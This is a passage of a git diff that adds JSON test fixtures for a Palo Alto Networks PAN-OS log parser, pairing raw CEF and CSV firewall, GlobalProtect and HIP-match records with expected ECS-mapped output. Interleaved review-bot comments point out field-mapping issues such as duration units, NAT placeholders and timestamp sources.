deviceExternalId=xxxxxxxxxxxxx PanOSConfigVersion= PanOSApplicationCategory=collaboration PanOSApplicationContainer= PanOSApplicationRisk=5 PanOSApplicationSubcategory=email PanOSApplicationTechnology=client-server PanOSCaptivePortal=false PanOSCloudHostname=PA-5220 PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDLPVersionFlag= PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom= duser= duid= PanOSFileType=PNG File Upload PanOSInboundInterfaceDetailsPort=19 PanOSInboundInterfaceDetailsSlot=1 PanOSInboundInterfaceDetailsType=ethernet PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=false PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted= PanOSIsDuplicateLog=false PanOSIsEncrypted= PanOSIsIPV6= PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded= PanOSIsSystemReturn=false PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=0 PanOSOutboundInterfaceDetailsPort=19 PanOSOutboundInterfaceDetailsSlot=1 PanOSOutboundInterfaceDetailsType=ethernet PanOSOutboundInterfaceDetailsUnit=0 PanOSPacket= PanOSProfileName= PanOSSanctionedStateOfApp=false PanOSSeverity=Low PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom= suser= suid= PanOSThreatCategory= PanOSThreatNameFirewall= PanOSTunneledApplication=untunneled PanOSURL= PanOSUsers=1.1.1.1 PanOSVirtualSystemID=1 start=Mar 01 2021 21:06:06 src=1.1.1.1 dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=dg-log-policy cs1Label=Rule suser0= duser0= app=smtp cs3=smtp cs3Label=VirtualLocation cs4=tap cs4Label=FromZone cs5=tap cs5Label=ToZone 
deviceInboundInterface=ethernet1/19 deviceOutboundInterface=ethernet1/19 cs6=test cs6Label=LogSetting cn1=4016143 cn1Label=SessionID cnt=9 spt=37404 dpt=25 sourceTranslatedPort=0 destinationTranslatedPort=0 proto=tcp act=alert filePath=page-icon.png cs2=any cs2Label=URLCategory flexString2=client to server flexString2Label=DirectionOfAttack externalId=xxxxxxxxxxxxx PanOSSourceLocation=1.1.1.1-1.1.1.1 PanOSDestinationLocation=1.1.1.1-1.1.1.1 fileId=0 PanOSFileHash= PanOSReportID= PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStartTime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSContentVersion= PanOSSigFlags=0 PanOSRuleUUID= PanOSHTTP2Connection= PanOSDynamicUserGroup= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSDomainEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSPartialHash= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12 PanOSReasonForDataFilteringAction= PanOSJustification= PanOSNSSAINetworkSliceType=", + "event": { + "action": "alert", + "category": [ + "file" + ], + "dataset": "threat", + "severity": 3, + "start": "2021-03-01T21:06:06Z", + "timezone": "UTC", + "type": [ + "info" + ] + }, + "@timestamp": "2021-03-01T21:06:06Z", + "action": { + "type": 
"file" + }, + "destination": { + "address": "1.1.1.1", + "ip": "1.1.1.1", + "nat": { + "ip": "1.1.1.1", + "port": 0 + }, + "port": 25 + }, + "host": { + "hostname": "PA-5220", + "id": "xxxxxxxxxxxxx", + "name": "PA-5220" + }, + "log": { + "hostname": "PA-5220", + "logger": "threat" + }, + "network": { + "application": "smtp", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "alias": "tap", + "id": "19", + "name": "ethernet1/19" + } + }, + "ingress": { + "interface": { + "alias": "tap", + "id": "19", + "name": "9" + } + }, + "product": "PAN-OS", + "type": "LF", + "vendor": "Palo Alto Networks", + "version": "2.0" + }, + "paloalto": { + "DirectionOfAttack": "client to server", + "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", + "PanOSSourceLocation": "1.1.1.1-1.1.1.1", + "URLCategory": "any", + "VirtualLocation": "smtp", + "endpoint": { + "serial_number": "xxxxxxxxxxxxxx" + } + }, + "related": { + "hosts": [ + "PA-5220" + ], + "ip": [ + "1.1.1.1" + ] + }, + "rule": { + "name": "dg-log-policy" + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1", + "nat": { + "ip": "1.1.1.1", + "port": 0 + }, + "port": 37404 + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_with_int.json new file mode 100644 index 000000000..512ae89e7 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_with_int.json 
@@ -0,0 +1,93 @@ +{ + "input": { + "message": "1,2023/06/16 10:41:44,001701003551,TRAFFIC,end,2305,2023/06/16 10:41:44,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,GEN_WINLOG_Users,domain\\pusername,userdest,windows-remote-management,vsys1,PDT_STD,INFRA_ADM,aaa.111,aaa.111,Syslog_Test,2023/06/16 10:41:44,234981,1,51413,5985,0,0,15,tcp,allow,2346,1974,372,9,90,16,30,0,69678105127,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,6,3,tcp-fin,0,0,0,0,,FWPA01,from-policy,,,0,,0,,N/A,0,0,0,0,5e7eca5b-f585-4633-bbd4-9ed431f7f95b,0,0,,,,,,," + }, + "expected": { + "message": "1,2023/06/16 10:41:44,001701003551,TRAFFIC,end,2305,2023/06/16 10:41:44,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,GEN_WINLOG_Users,domain\\pusername,userdest,windows-remote-management,vsys1,PDT_STD,INFRA_ADM,aaa.111,aaa.111,Syslog_Test,2023/06/16 10:41:44,234981,1,51413,5985,0,0,15,tcp,allow,2346,1974,372,9,90,16,30,0,69678105127,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,6,3,tcp-fin,0,0,0,0,,FWPA01,from-policy,,,0,,0,,N/A,0,0,0,0,5e7eca5b-f585-4633-bbd4-9ed431f7f95b,0,0,,,,,,,", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "traffic", + "duration": 16, + "outcome": "success", + "type": [ + "end" + ] + }, + "@timestamp": "2023-06-16T10:41:44Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "end" + }, + "destination": { + "address": "5.6.7.8", + "bytes": 372, + "ip": "5.6.7.8", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "packets": 3, + "port": 5985, + "user": { + "name": "userdest" + } + }, + "log": { + "hostname": "FWPA01", + "logger": "traffic" + }, + "network": { + "application": "windows-remote-management", + "bytes": 2346, + "packets": 9, + "transport": "tcp" + }, + "observer": { + "name": "FWPA01", + "product": "PAN-OS", + "serial_number": "001701003551" + }, + "paloalto": { + "Threat_ContentType": "end", + "VirtualLocation": "vsys1" + }, + "related": { + "ip": [ + "0.0.0.0", + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "pusername", + 
"userdest" + ] + }, + "rule": { + "name": "GEN_WINLOG_Users", + "uuid": "5e7eca5b-f585-4633-bbd4-9ed431f7f95b" + }, + "source": { + "address": "1.2.3.4", + "bytes": 1974, + "ip": "1.2.3.4", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "packets": 6, + "port": 51413, + "user": { + "domain": "domain", + "name": "pusername" + } + }, + "user": { + "domain": "domain", + "name": "pusername" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_without_int.json b/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_without_int.json new file mode 100644 index 000000000..add589697 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_without_int.json 
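Review bot: The expectation promotes the `0.0.0.0` NAT placeholders into `related.ip` (`"0.0.0.0", "1.2.3.4", "5.6.7.8"`) and into `source.nat.ip`/`destination.nat.ip` with `port: 0`, although the input's NAT columns are zero presumably because no translation applied to this session. Any detection or pivot that joins on `related.ip` will then match every non-NATed session on `0.0.0.0`, which is noise rather than an observable address. I would have the parser skip NAT fields whose address is `0.0.0.0` (and port `0`) and pin that here by removing `"0.0.0.0"` from `related.ip` and dropping the two `nat` objects from the expectation; the sibling `fix_bug_without_int.json` fixture carries the same shape and should change with it.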
@@ -0,0 +1,91 @@ +{ + "input": { + "message": "1,2023/06/16 10:41:44,001701003551,TRAFFIC,end,2305,2023/06/16 10:41:44,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,GEN_WINLOG_Users,domainusername,destuser,windows-remote-management,vsys1,PDT_STD,INFRA_ADM,aaa.111,aaa.111,Syslog_Test,2023/06/16 10:41:44,234981,1,51413,5985,0,0,0x1c,tcp,allow,2346,1974,372,9,2023/06/16 10:41:26,16,not-resolved,0,69678105127,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,6,3,tcp-fin,0,0,0,0,,FWPA01,from-policy,,,0,,0,,N/A,0,0,0,0,5e7eca5b-f585-4633-bbd4-9ed431f7f95b,0,0,,,,,,," + }, + "expected": { + "message": "1,2023/06/16 10:41:44,001701003551,TRAFFIC,end,2305,2023/06/16 10:41:44,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,GEN_WINLOG_Users,domainusername,destuser,windows-remote-management,vsys1,PDT_STD,INFRA_ADM,aaa.111,aaa.111,Syslog_Test,2023/06/16 10:41:44,234981,1,51413,5985,0,0,0x1c,tcp,allow,2346,1974,372,9,2023/06/16 10:41:26,16,not-resolved,0,69678105127,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,6,3,tcp-fin,0,0,0,0,,FWPA01,from-policy,,,0,,0,,N/A,0,0,0,0,5e7eca5b-f585-4633-bbd4-9ed431f7f95b,0,0,,,,,,,", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "traffic", + "duration": 16, + "outcome": "success", + "type": [ + "end" + ] + }, + "@timestamp": "2023-06-16T10:41:44Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "end" + }, + "destination": { + "address": "5.6.7.8", + "bytes": 372, + "ip": "5.6.7.8", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "packets": 3, + "port": 5985, + "user": { + "name": "destuser" + } + }, + "log": { + "hostname": "FWPA01", + "logger": "traffic" + }, + "network": { + "application": "windows-remote-management", + "bytes": 2346, + "packets": 9, + "transport": "tcp" + }, + "observer": { + "name": "FWPA01", + "product": "PAN-OS", + "serial_number": "001701003551" + }, + "paloalto": { + "Threat_ContentType": "end", + "VirtualLocation": "vsys1" + }, + "related": { + "ip": [ + "0.0.0.0", + "1.2.3.4", + 
"5.6.7.8" + ], + "user": [ + "destuser", + "domainusername" + ] + }, + "rule": { + "name": "GEN_WINLOG_Users", + "uuid": "5e7eca5b-f585-4633-bbd4-9ed431f7f95b" + }, + "source": { + "address": "1.2.3.4", + "bytes": 1974, + "ip": "1.2.3.4", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "packets": 6, + "port": 51413, + "user": { + "name": "domainusername" + } + }, + "user": { + "name": "domainusername" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_cef.json new file mode 100644 index 000000000..4fd7b8802 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_cef.json 
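Review bot: `event.duration: 16` copies the elapsed-time column (`...,9,2023/06/16 10:41:26,16,not-resolved,...`) unchanged, but PAN-OS reports elapsed time in seconds while ECS defines `event.duration` in nanoseconds, so consumers computing session length will be off by a factor of 1e9; the parser should convert and the expectation should read `"duration": 16000000000` (the same applies to `fix_bug_with_int.json` and `icmp_allow_csv.json`). Separately, this fixture and `fix_bug_with_int.json` exist to cover the start-time column being a date versus an integer (`90`), yet neither expectation asserts anything derived from that column — there is no `event.start` — so the test passes whether the date here is parsed, ignored or mis-parsed. I would pin it with `"start": "2023-06-16T10:41:26Z"` under `event`, or assert its deliberate absence in a comment on the parser stage that skips it.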
@@ -0,0 +1,73 @@ +{ + "input": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|GLOBALPROTECT|globalprotect|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:35:54 PanOSDeviceSN=xxxxxxxxxxxxx PanOSConfigVersion= start=Mar 01 2021 20:35:54 PanOSVirtualSystem=vsys1 PanOSEventIDValue=satellite-gateway-update-route PanOSStage=connected PanOSAuthMethod=RADIUS PanOSTunnelType=ipsec PanOSSourceUserName=xxxxx\\\\\\\\xxxxx PanOSSourceRegion=ET PanOSEndpointDeviceName=machine_name2 PanOSPublicIPv4=1.1.1.1 PanOSPublicIPv6=xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx PanOSPrivateIPv4=1.1.1.1 PanOSPrivateIPv6=xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx PanOSHostID=xxxxxxxxxxxxxxe667947f-d92e-4815-9222-89438203bc2b PanOSEndpointSN=serialno_list-1 PanOSGlobalProtectClientVersion=3.0.9 PanOSEndpointOSType=Intel Mac OS PanOSEndpointOSVersion=9.3.5 PanOSCountOfRepeats=16777216 PanOSQuarantineReason=Malicious Traffic PanOSConnectionError=Client cert not present PanOSDescription=opaque_list-1 PanOSEventStatus=failure PanOSGlobalProtectGatewayLocation=San Francisco PanOSLoginDuration=1 PanOSConnectionMethod=connect_method_list-1 PanOSConnectionErrorID=0 PanOSPortal=portal_list-2 PanOSSequenceNo=34401910 PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12 PanOSGatewaySelectionType= PanOSSSLResponseTime= PanOSGatewayPriority= PanOSAttemptedGateways= PanOSGateway= PanOSDGHierarchyLevel1=20 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= PanOSDeviceName=PA-VM PanOSVirtualSystemID=1" + }, + "expected": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|GLOBALPROTECT|globalprotect|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:35:54 PanOSDeviceSN=xxxxxxxxxxxxx PanOSConfigVersion= start=Mar 01 2021 20:35:54 PanOSVirtualSystem=vsys1 PanOSEventIDValue=satellite-gateway-update-route PanOSStage=connected PanOSAuthMethod=RADIUS PanOSTunnelType=ipsec PanOSSourceUserName=xxxxx\\\\\\\\xxxxx PanOSSourceRegion=ET PanOSEndpointDeviceName=machine_name2 
PanOSPublicIPv4=1.1.1.1 PanOSPublicIPv6=xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx PanOSPrivateIPv4=1.1.1.1 PanOSPrivateIPv6=xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx PanOSHostID=xxxxxxxxxxxxxxe667947f-d92e-4815-9222-89438203bc2b PanOSEndpointSN=serialno_list-1 PanOSGlobalProtectClientVersion=3.0.9 PanOSEndpointOSType=Intel Mac OS PanOSEndpointOSVersion=9.3.5 PanOSCountOfRepeats=16777216 PanOSQuarantineReason=Malicious Traffic PanOSConnectionError=Client cert not present PanOSDescription=opaque_list-1 PanOSEventStatus=failure PanOSGlobalProtectGatewayLocation=San Francisco PanOSLoginDuration=1 PanOSConnectionMethod=connect_method_list-1 PanOSConnectionErrorID=0 PanOSPortal=portal_list-2 PanOSSequenceNo=34401910 PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12 PanOSGatewaySelectionType= PanOSSSLResponseTime= PanOSGatewayPriority= PanOSAttemptedGateways= PanOSGateway= PanOSDGHierarchyLevel1=20 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= PanOSDeviceName=PA-VM PanOSVirtualSystemID=1", + "event": { + "category": [ + "session" + ], + "dataset": "globalprotect", + "reason": "Client cert not present", + "severity": 3, + "start": "2021-03-01T20:35:54Z", + "timezone": "UTC", + "type": [ + "start" + ] + }, + "@timestamp": "2021-03-01T20:35:54Z", + "action": { + "name": "satellite-gateway-update-route", + "type": "globalprotect" + }, + "host": { + "hostname": "machine_name2", + "name": "machine_name2", + "os": { + "type": "Intel Mac OS" + } + }, + "log": { + "logger": "globalprotect" + }, + "network": { + "type": "ipsec" + }, + "observer": { + "product": "PAN-OS", + "type": "LF", + "vendor": "Palo Alto Networks", + "version": "2.0" + }, + "paloalto": { + "PanOSQuarantineReason": "Malicious Traffic", + "authentication": { + "method": "RADIUS" + }, + "connection": { + "method": "connect_method_list-1", + "stage": "connected" + } + }, + "related": { + "hosts": [ + "machine_name2" + ], + "user": [ + "xxxxx" + ] + }, + 
"source": { + "user": { + "domain": "xxxxx", + "name": "xxxxx" + } + }, + "user": { + "domain": "xxxxx", + "name": "xxxxx" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv.json new file mode 100644 index 000000000..65f2b6940 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv.json 
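Review bot: The input carries `PanOSEventStatus=failure` and `PanOSConnectionError=Client cert not present`, but the expectation only records `event.reason`; there is no `event.outcome: "failure"`, while the CSV GlobalProtect fixtures in this same commit do set `event.outcome` from the status column. A failed VPN connection indexed without an outcome is invisible to any rule counting failed logons, so I would add `"outcome": "failure"` under both `event` and `action` here, or confirm the CEF path is intentionally ignoring the status. Separately, `PanOSPublicIPv4=1.1.1.1` / `PanOSPrivateIPv4=1.1.1.1` are not surfaced as `source.ip` / `source.nat.ip` / `related.ip`, so the client address is lost entirely, and `host.os.type: "Intel Mac OS"` puts a vendor string into a field where ECS expects one of the fixed keywords (`macos`, `windows`, …); `host.os.name` or `host.os.full` is the right home for that value.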
@@ -0,0 +1,72 @@ +{ + "input": { + "message": "1,2020/12/08 14:30:55,011111114444,GLOBALPROTECT,0,2305,2020/12/08 13:30:55,vsys1,gw-auth,login,Other,,user,FR,AAAABBBBB,1.2.3.4,0.0.0.0,0.0.0.0,0.0.0.0,aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee,ABCDEFG,5.1.4,Windows,\"Microsoft Windows 10 Pro , 64-bit\",1,,,\"\",success,,0,user-logon,0,gw1,1234567,0x8000000000000000" + }, + "expected": { + "message": "1,2020/12/08 14:30:55,011111114444,GLOBALPROTECT,0,2305,2020/12/08 13:30:55,vsys1,gw-auth,login,Other,,user,FR,AAAABBBBB,1.2.3.4,0.0.0.0,0.0.0.0,0.0.0.0,aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee,ABCDEFG,5.1.4,Windows,\"Microsoft Windows 10 Pro , 64-bit\",1,,,\"\",success,,0,user-logon,0,gw1,1234567,0x8000000000000000", + "event": { + "category": [ + "session" + ], + "dataset": "globalprotect", + "outcome": "success", + "type": [ + "start" + ] + }, + "@timestamp": "2020-12-08T14:30:55Z", + "action": { + "name": "gw-auth", + "outcome": "success", + "type": "0" + }, + "host": { + "name": "AAAABBBBB", + "os": { + "version": "Microsoft Windows 10 Pro , 64-bit" + } + }, + "log": { + "logger": "globalprotect" + }, + "observer": { + "product": "PAN-OS", + "serial_number": "ABCDEFG" + }, + "paloalto": { + "EventID": "gw-auth", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "connection": { + "stage": "login" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "user" + ] + }, + "source": { + "address": "1.2.3.4", + "geo": { + "country_iso_code": "FR" + }, + "ip": "1.2.3.4", + "user": { + "name": "user" + } + }, + "user": { + "name": "user" + }, + "user_agent": { + "os": { + "name": "Windows", + "version": "Microsoft Windows 10 Pro , 64-bit" + } + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv_2.json new file mode 100644 index 000000000..e4b1d5fab --- /dev/null 
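Review bot: `@timestamp` is pinned to `2020-12-08T14:30:55Z`, which is the record's second column (receive time as I read the PAN-OS GlobalProtect layout), while the seventh column — generated time — is `2020/12/08 13:30:55`, a full hour earlier; in `globalprotect_csv_2.json` the same commit takes `@timestamp` from the high-resolution generated timestamp instead. Mixing receive and generation time across fixtures of one log type skews timelines by the forwarding delay and makes correlation with gateway-side logs unreliable. If the high-resolution column is absent, I would fall back to the generated-time column and pin `"@timestamp": "2020-12-08T13:30:55Z"` here, keeping the receive time, if wanted, in a vendor field. Also `action.type: "0"` and `paloalto.Threat_ContentType: "0"` copy a column that carries no meaning for GLOBALPROTECT records; emitting a literal `"0"` as an action type is noise a consumer may treat as a category.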
+++ b/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv_2.json 
@@ -0,0 +1,74 @@ +{ + "input": { + "message": "1,2023/06/28 14:40:42,015451000032715,GLOBALPROTECT,0,2562,2023/06/28 14:40:42,vsys1,gateway-config-release,configuration,,,example.org\\\\test,EN,2021-02707,88.120.236.74,0.0.0.0,10.0.0.232,0.0.0.0,8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3,DFN3535D,6.0.4,Windows,\"Microsoft Windows 10 Enterprise , 64-bit\",1,,,,success,,0,,0,VPN_GATEWAY,5555555555555555555,0x8000000000000000,2023-06-28T14:40:43.134+02:00,,,,,,0,0,0,0,,VPN-DOM-01,1\n" + }, + "expected": { + "message": "1,2023/06/28 14:40:42,015451000032715,GLOBALPROTECT,0,2562,2023/06/28 14:40:42,vsys1,gateway-config-release,configuration,,,example.org\\\\test,EN,2021-02707,88.120.236.74,0.0.0.0,10.0.0.232,0.0.0.0,8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3,DFN3535D,6.0.4,Windows,\"Microsoft Windows 10 Enterprise , 64-bit\",1,,,,success,,0,,0,VPN_GATEWAY,5555555555555555555,0x8000000000000000,2023-06-28T14:40:43.134+02:00,,,,,,0,0,0,0,,VPN-DOM-01,1\n", + "event": { + "category": [ + "session" + ], + "dataset": "globalprotect", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2023-06-28T12:40:43.134000Z", + "action": { + "name": "gateway-config-release", + "outcome": "success", + "type": "0" + }, + "host": { + "name": "2021-02707", + "os": { + "version": "Microsoft Windows 10 Enterprise , 64-bit" + } + }, + "log": { + "logger": "globalprotect" + }, + "observer": { + "product": "PAN-OS", + "serial_number": "DFN3535D" + }, + "paloalto": { + "EventID": "gateway-config-release", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "connection": { + "stage": "configuration" + } + }, + "related": { + "ip": [ + "88.120.236.74" + ], + "user": [ + "test" + ] + }, + "source": { + "address": "88.120.236.74", + "geo": { + "country_iso_code": "EN" + }, + "ip": "88.120.236.74", + "user": { + "domain": "example.org", + "name": "test" + } + }, + "user": { + "domain": "example.org", + "name": "test" + }, + "user_agent": { + "os": { + "name": "Windows", + "version": 
"Microsoft Windows 10 Enterprise , 64-bit" + } + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/hip_match_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/hip_match_cef.json new file mode 100644 index 000000000..6a0a99b82 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/hip_match_cef.json 
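Review bot: The source-region column `EN` is copied verbatim into `source.geo.country_iso_code`, but `EN` is not an ISO 3166-1 alpha-2 country code (it is a language code), and PAN-OS puts other non-country values in that column — the traffic fixtures in this commit show `Spain`/`France` and `10.0.0.0-10.255.255.255`. Writing arbitrary strings into `country_iso_code` breaks downstream geo enrichment and map widgets that assume a two-letter code. I would only populate `country_iso_code` when the value matches `^[A-Z]{2}$`, otherwise store it in `source.geo.name` or a vendor field, and pin that with one fixture holding a real code (e.g. `FR`) and one holding a private range. Minor: this fixture embeds a real public address (`88.120.236.74`) where the other fixtures use documentation ranges; prefer sanitized values in committed test data.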
@@ -0,0 +1,72 @@ +{ + "input": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|HIPMATCH||3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:20:13 deviceExternalId=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=xxxxx dntdom=xxxxx suser=xxxxx xxxxx duser=xxxxx xxxxx suid= duid= PanOSTenantID=xxxxxxxxxxxxx PanOSUUID= PanOSConfigVersion= start=Mar 01 2021 21:20:13 PanOSSourceUser=xxxxx\\\\xxxxx xxxxx cs3=vsys1 cs3Label=VirtualLocation shost=machine_name1 dhost=machine_name1 cs2=iOS cs2Label=EndpointOSType src=1.1.1.1 dst=1.1.1.1 cat=match_name1 cnt=1 PanOSHipMatchType=HIP Profile externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 cn2=1 cn2Label=VirtualSystemID c6a1=xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx c6a1Label=Device IPv6 Address PanOSHostID=xxxxxxxxxxxxxxe777947f-d92e-4815-9222-89438203bc2b PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceMac= PanOSSourceDeviceHost= PanOSSource= PanOSTimestampDeviceIdentification=Dec PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12" + }, + "expected": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|HIPMATCH||3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:20:13 deviceExternalId=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=xxxxx dntdom=xxxxx suser=xxxxx xxxxx duser=xxxxx xxxxx suid= duid= PanOSTenantID=xxxxxxxxxxxxx PanOSUUID= PanOSConfigVersion= start=Mar 01 2021 
21:20:13 PanOSSourceUser=xxxxx\\\\xxxxx xxxxx cs3=vsys1 cs3Label=VirtualLocation shost=machine_name1 dhost=machine_name1 cs2=iOS cs2Label=EndpointOSType src=1.1.1.1 dst=1.1.1.1 cat=match_name1 cnt=1 PanOSHipMatchType=HIP Profile externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 cn2=1 cn2Label=VirtualSystemID c6a1=xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx c6a1Label=Device IPv6 Address PanOSHostID=xxxxxxxxxxxxxxe777947f-d92e-4815-9222-89438203bc2b PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceMac= PanOSSourceDeviceHost= PanOSSource= PanOSTimestampDeviceIdentification=Dec PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "severity": 3, + "start": "2021-03-01T21:20:13Z", + "timezone": "UTC", + "type": [ + "info" + ] + }, + "@timestamp": "2021-03-01T21:20:13Z", + "destination": { + "address": "1.1.1.1", + "ip": "1.1.1.1", + "user": { + "name": "xxxxx xxxxx" + } + }, + "host": { + "hostname": "PA-5220", + "id": "xxxxxxxxxxxxx", + "name": "PA-5220" + }, + "log": { + "hostname": "PA-5220", + "logger": "hipmatch" + }, + "observer": { + "product": "PAN-OS", + "type": "LF", + "vendor": "Palo Alto Networks", + "version": "2.0" + }, + "paloalto": { + "PanOSEndpointSerialNumber": 